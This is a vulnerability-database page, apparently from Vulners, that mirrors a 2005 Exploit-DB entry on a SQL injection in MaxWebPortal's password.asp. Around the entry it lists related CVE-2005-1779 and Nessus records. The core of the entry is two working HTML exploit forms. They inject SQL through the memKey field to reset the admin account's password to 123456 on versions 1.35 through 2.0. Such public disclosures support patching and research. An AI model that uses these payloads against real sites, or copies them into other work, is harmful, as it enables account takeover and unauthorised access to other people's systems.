Lucene search
+L

Maxwebportal 1.36 - 'Password.asp' Change Password (1) (HTML)

🗓️ 26 May 2005 00:00:00Reported by Soroush DaliliType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 27 Views

SQL injection vulnerability in Maxwebportal allows password changes for any user via memKey input.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
MaxWebPortal password.asp memKey Parameter SQL Injection
25 May 200500:00
nessus
nessus
Tenable Nessus
MaxWebPortal memKey Parameter SQL Injection
26 May 200500:00
nessus
cve
CVE
CVE-2005-1779
31 May 200504:00
cve
cvelist
Cvelist
CVE-2005-1779
31 May 200504:00
cvelist
exploitdb
Exploit DB
Maxwebportal 1.36 - 'Password.asp' Change Password (3)
26 May 200500:00
exploitdb
exploitdb
Exploit DB
Maxwebportal 1.36 - 'Password.asp' Change Password (2)
26 May 200500:00
exploitdb
euvd
EUVD
EUVD-2005-1781
7 Oct 202500:30
euvd
nvd
NVD
CVE-2005-1779
31 May 200504:00
nvd
<!--
Hi, I'm Soroush Dalili from Grayhatz Security Group (GSG) . I found dangerous sql injection
in Maxwebportal version 1.35,1.36,2.0, 20050418 Next
Remote user can inject his/her code in "memKey" var. and change other users password in
password.asp

Exploit codes to proof:
-->

-----------------Code Start-----Version 1.35 and older--------------
<form action="http://[URL]/password.asp?mode=reset" method="post">
<br>
pass1: <input name="pass" type="text" value="123456" size="150"><br>
pass2: <input name="pass2" type="text" value="123456" size="150"><br>
Id: <input name="memId" type="text" value="-1" size="150"><br>
Member Key: <input name="memKey" type="text" value="foo' or M_Name='admin" size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------

Version 1.36, 2.0, 20050418 Next:

-----------------Code Start-----Version 1.36, 2.0, 20050418 Next--------------
<form action="http://[URL]/password.asp?mode=reset" method="post">
<br>
pass1: <input name="pass" type="text" value="123456" size="150"><br>
pass2: <input name="pass2" type="text" value="123456" size="150"><br>
Id: <input name="memId" type="text" value="-1" size="150"><br>
Member Key: <input name="memKey" type="text" value="foo') or M_Name='admin' or ('1'='2"

size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------

# milw0rm.com [2005-05-26]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02025
27